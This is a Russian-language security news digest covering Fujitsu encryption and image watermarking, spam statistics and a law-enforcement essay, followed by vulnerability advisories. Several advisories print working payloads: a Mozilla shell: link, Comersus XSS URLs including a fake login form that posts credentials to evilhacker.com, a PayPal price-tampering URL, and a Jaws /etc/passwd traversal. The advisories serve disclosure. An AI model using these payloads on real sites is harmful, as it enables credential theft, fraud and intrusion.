Новая невзламываемая технология шифрования данных для смарт-карт

Компания Fujitsu объявила о разработке новой технологии шифрования данных для смарт-карт, которую, наверное, можно назвать невзламываемой (если только взломщики не докажут обратное). По заявлению Fujitsu, для взлома кода, даже если привлечь для этой задачи суперкомпьютер, понадобится порядка 20 млн лет, что делает эту затею практически нереальной.

Как сообщается, новая технология от Fujitsu использует широко распространенный метод шифрования по алгоритму RSA. В данном случае в качестве кода используются 2048-значные числа, то есть вдвое более длинные, чем в других технологиях, построенных на алгоритме RSA. Правда, подобная "многозначность" имеет оборотную сторону - для обработки таких карт в картоводе потребуется довольно много времени (несколько часов). А это вряд ли понравится пользователям, Однако Fujitsu решила и эту проблему, разработав для карт новый чип, который работает с более высокой скоростью, чем обычные. Так что можно ожидать, что в скором времени Fujitsu в стране восходящего солнца появятся новые кредитные карточки с функцией цифровой подписи.

Fujitsu предлагает внедрять в изображения скрытую информацию

Корпорация Fujitsu разработала технологию, которая позволяет "прятать" в графических изображениях какую-либо дополнительную информацию, например, номера телефонов или адреса веб-сайтов. Причем для человеческого глаза такая информация остается совершенно неразличимой, а считать ее можно посредством встроенных в мобильные телефоны и карманные компьютеры камер.

Работает предложенная система следующим образом. Исходное изображение разбивается на небольшие области размером 0,8 мм² и меньше. Затем проводится анализ интенсивности желтого цвета в каждом полученном фрагменте. Наконец, на заключительном этапе на изображение накладывается нужный текст в виде точек желтого цвета соответствующей яркости. Выбор желтого цвета объясняется просто: человеческий глаз с трудом различает его оттенки, а поэтому наличие дополнительных элементов будет практически незаметно.

Область размером 1 см² позволяет "закодировать" до двенадцати символов. При этом текст будет одинаково хорошо распознан, даже если распечатка получилась слишком темной или, напротив, бледной. Кстати, время считывания и обработки "водных меток" на КПК Fujitsu со специализированным программным обеспечением занимает около 0,4 с.

Разработчики рассчитывают, что предложенная методика позволит незаметно размещать на плакатах те или иные рекламные сведения, которые при необходимости можно быстро загрузить в память портативного устройства. А например, внедрение скрытого телефона и адреса электронной почты в визитную карточку избавит от необходимости записывать их вручную. Стоит также заметить, что подобный подход используется в стеганографии для сокрытия секретной информации.

Троян Hacdef способен обходить межсетевую защиту

Доля спама занимает до 70% всей электронной почты в мире

Спам в настоящее время составляет около 70% всей электронной почты в мире. Эти данные приводит американская компания MessageLabs, специализирующаяся на создании программ-фильтров.

В апреле этого года количество рассылаемого спама (в основном, рекламных объявлений) снова резко увеличилось. "Мы считаем, что к середине года доля спама возрастет до 80%", - говорит эксперт по информационной безопасности Наташа Стэли, работающая в MessageLabs.

Компания Commtouch Software, которая разрабатывает программное обеспечение для борьбы со спамом, провела исследования с намерением выяснить, какая страна является лидером в рассылке нежелательной корреспонденции.
В ходе анализа выяснилось, что доминирующее положение занимает США. 55,7% сообщений, которые засоряют почтовые ящики организаций и частных пользователей всего мира, отсылаются именно из этой страны.

Второе место по данному показателю занимает Корея - оттуда отправляется 10,2% спама. На третьем месте располагается Китай с 6,6% мирового спам-трафика.
Лидирующее место США эксперты оправдывают тем, что в стране много высокоскоростных линий соединения с Интернетом.

В начале года в США вступил в силу Акт о борьбе со спамом, но специалисты уже критикуют его за половинчатость и неэффективность. Спамеры легко приспособились к его требованиям. Закон, в частности, предусматривает, что любой отправитель электронной почты обязан указывать обратный адрес. Следует отметить, что европейское законодательство жестче американского. В ЕС рассыльщик рекламных объявлений обязан сначала спросить разрешения у адресата. В США, наоборот, адресат должен потребовать прекратить посылать ему спам. Однако, поскольку львиная доля спама создается за океаном, европейское правило фактически не действует. "Акт нуждается в доработке. В нынешнем виде он скорее создает легальные рамки для спама, чем искореняет его", -считает Наташа Стэли.

В марте American Online, Earthlink, Microsoft и Yahoo подали совместные иски против примерно 100 самых злостных спамеров. Microsoft также предложил взимать символическую плату за отправку каждого электронного письма. Это практически не отразится на обычных компьютерных пользователях, но ударит по карману спамеров, рассылающих свои послания миллионами. "Сочетание технологических и юридических методов, в конце концов, должно принести результат", - говорит Стэли.

Между тем, спам меняется не только количественно, но и качественно. По данным производителя программ-фильтров, Clearswift, доля порнографии в нем упала до 5%, зато доля финансовой информации, прежде всего, рекламы дешевых кредитов и биржевых прогнозов, возросла до 38%. На первом же месте (40%) - по-прежнему медицинская реклама.

Убытки от спама (потери рабочего времени, расходы на программы-фильтры и борьбу с занесенными вирусами) составляют в США порядка $10 млрд. в год. Соответствующая цифра для Британии - 3.2 млрд. фунтов. Об этом сообщает ВВС.

Microsoft работает над серией исправлений для Internet Explorer

Gartner: Модные usb устройства - серьезная угроза корпоративной безопасности

Информационная разведка - задачи и возможности

Наиболее законспирированная и уходящая из-под контроля "беловоротничковая" преступность действует, преимущественно, в финансово-экономической сфере, неотъемлемой частью которой является информационная среда, или же использует ее возможности при совершении целой гаммы преступлений как очевидного, так и скрытого характера.

В числе этих преступлений такие, как собственно компьютерные преступления, так и целый "букет" других: уклонение от налогов, хищения, мошенничества, совершенные путем взлома электронных систем защиты, все диффамационные деликты с использованием СМИ.

Нельзя сказать, что процессы подключения информационной среды к преступной деятельности не остались незамеченными. За последние годы различные службы криминальной милиции провели ряд успешных разработок в отношении отдельных лиц и группировок, использовавших для совершения преступлений корыстной направленности современные технические средства и действовавшие в информационной среде общества.

Одна из основных угроз – несанкционированный доступ к защищаемой информации. Пентагон, в частности, ежегодно фиксирует до 250 тысяч попыток проникновения в свои компьютерные сети. Аналитики этого ведомства считают 40 тысяч пользователей Интернет потенциальными шпионами, поскольку уровень их квалификации позволяет взламывать защитные коды и получать даже секретную информацию военного характера. В связи с этим и контрмеры принимаются адекватные. Более 500 агентов ФБР и калифорнийской полиции 18 месяцев охотились в Силиконовой долине за хакерами, похищавшими компьютерные технологии. Прямой ущерб, нанесенный только одним из четырех главарей преступников-интеллектуалов, оценивался в 19 миллионов долларов. Всего же в ходе той беспрецедентной операции было арестовано 43 кибервзломщика.

Развитие информационных технологий позволяет обрабатывать значительные массивы информации, выделяя из них сведения, представляющие разведывательный интерес (использование экспертных систем в радиоразведке, легальной разведке в СМИ и разведке в телекоммуникационной сфере и различного рода АБД); применение при ведении разработочных мероприятий значительного объема первичной, но высокодостоверной и практически не подлежащей проверке через другие источники оперативной информации, получаемой в ходе осуществления разведпоиска в информационной среде, где она проходит идентификацию и документирование с использованием аппаратно-программных средств. Эта особенность информации позволяет перехватывать и расшифровывать переговоры членов банд, устанавливать личности за позывными главарей, точные координаты, что в ряде случаев позволило предупредить террористические акты или, используя переносную компьютерную систему, подключенную через спутниковую связь к федеральным АБД, при проверках паспортного режима находить преступников, числящихся в федеральном и региональном розыске. И это только небольшой перечень решаемых задач.

Яндекс поддержит антиспамовую технологию Microsoft

Начитается регистрация участников международной конференции ISDEF’2004

Удаленное выполнение произвольных программ в Mozilla

<a href=shell:windows\\system32\\calc.exe>1</a>

DoS против Nokia 3560 телефонов

Программа: Nokia 3560 Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость в Nokia 3560 телефонах позволяет удаленному пользователю вызвать отказ в обслуживании. Удаленный пользователь может послать специально сформированное текстовое сообщение к целевому пользователю, чтобы аварийно завершить работу телефона. Для восстановления нормальной работы потребуется отключение батарей. При получении злонамеренного сообщения, телефон не сообщает о получении нового сообщения и не сохраняет злонамеренное сообщение. URL производителя: http://www.nokia.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Несколько уязвимостей в Ethereal

Программа: Ethereal 0.8.15-0.10.4 Опасность: Высокая Наличие эксплоита: Нет Описание: Несколько уязвимостей обнаружено в Ethereal в the iSNS, SMB, и SNMP диссекторах. Удаленный пользователь может аварийно завершить работу Ethereal процесса и может выполнить произвольный код на целевой системе. 1. Уязвимость в iSNS анализаторе позволяет аварийно завершить работу Ethereal или выполнить произвольный код на системе. 2. Уязвимость в SMB анализаторе позволяет удаленному пользователю аварийно завершить работу приложения, когда включена SID snooping и не определено имя политики для обработчика. 3. Уязвимость в SNMP анализаторе может использоваться для аварийного завершения работы приложения через специально обработанную community сторку. URL производителя> http://www.ethereal.com/appnotes/enpa-sa-00015.html Решение: Установите обновленную версию программы (0.10.5): http://www.ethereal.com/download.html

Неавторизованный доступ в Zoom X3 ADSL модеме

Программа: Zoom X3 ADSL Modem Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость конфигурации в Zoom X3 ADSL модеме позволяет удаленному пользователю получить доступ к некоторым параметрам конфигурации. По умолчанию, модем позволяет удаленному пользователю подключится к 23 (telnet), 80(http), 254 и 255 портам. Удаленный пользователь может подключится к 254 порту, и пароль по умолчанию чтобы получить доступ к некоторым установкам на устройстве, даже если пароль был изменен. Система выдает следующий баннер: "ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.27" Уязвимость может воздействовать на другие модемы, использующие Conexant чип. URL производителя: http://www.zoom.com/products/adsl_overview.html Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время

Межсайтовый скриптинг в NPDS

Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость в NPDS позволяет удаленному пользователю выполнить XSS нападение. Эксплоит: См. Источник сообщения. URL производителя: http://www.npds.org/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время

Несколько уязвимостей в Comersus

Программа: Comersus 5.09 Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Comersus. Удаленный пользователь может выполнить XSS нападение и изменять цену покупки. 1. XSS: ttp://[VICTIM]/comersus/store/comersus_message.asp?message=<meta%20http-equiv='refresh'content='0'> http://[VICTIM]/comersus/store/comersus_message.asp? message=<form%20action=" http://www.evilhacker.com/save2db.asp"%20method="post">Username:<input%20nam e="username"%20type="text"%20maxlength="30"><br>Password:<input%20 name="pass word"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submi t"%20value="Login"></form> http://[VICTIM]/comersus/backofficeLite/comersus_b ackoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script> 2. Удаленный пользователь может изменять цену покупки, перед оплатой товара через PayPal. http://[VICTIM]/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&Order Total=|102|222|228|22|130|36| 209&name=Thomas&lastName=Ryan&address=123+Easy+ Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D 1731&email=tommy%40providesecurity%2Ecom&or derDetails=1x+%23RDHT%2F11+Red+Ha t+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Mi llennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BP RES2%2F6+So+You+Wan t+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A URL производителя: http://www.comersus.com/ Решение: Установите обновленную версию программы (5.098): http://www.comersus.com/download.html

Несколько уязвимостей в Jaws

Программа: Jaws 0.3 Опасность: Высокая Наличие эксплоита: Описание: Несколько уязвимостей обнаружено в Jaws. Удаленный пользователь может получить административный доступ. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный пользователь может также определить инсталляционный путь и выполнить XSS нападение. 1. Удаленный пользователь может получить административный доступ к целевому приложению из за логической ошибки в функции logged_on(). Удаленный пользователь может установить специально обработанное значение Куки к MD5 хешу или нулевому значению, чтобы получить доступ через admin.php сценарий. 2. Просмотр произвольных файлов: http://127.0.0.1/jaws/index.php?gadget=././././././. ././././etc/passwd%00&path=/etc 3. Определение инсталляционного пути: http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc 4. Раскрытие инсталляционного пути: http://127.0.0.1/jaws/include/config.php 5. XSS: http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b> http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script> URL производителя: http://www.jaws.com.mx/ Решение: Установите обновленную версию программы (0.3).

Раскрытие информации в Google GMail

Программа: Google GMail Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость в Google GMail позволяет удаленному пользователю определить информацию о другом пользователе, пытающимся зарегистрироваться в системе. Удаленный пользователь может вызвать сценарий '/accounts/CheckAvailability' чтобы заставить систему отобразить информацию (имя и фамилию целевого пользователя), относящуюся к запросу другого пользователя. URL производителя: http://gmail.google.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время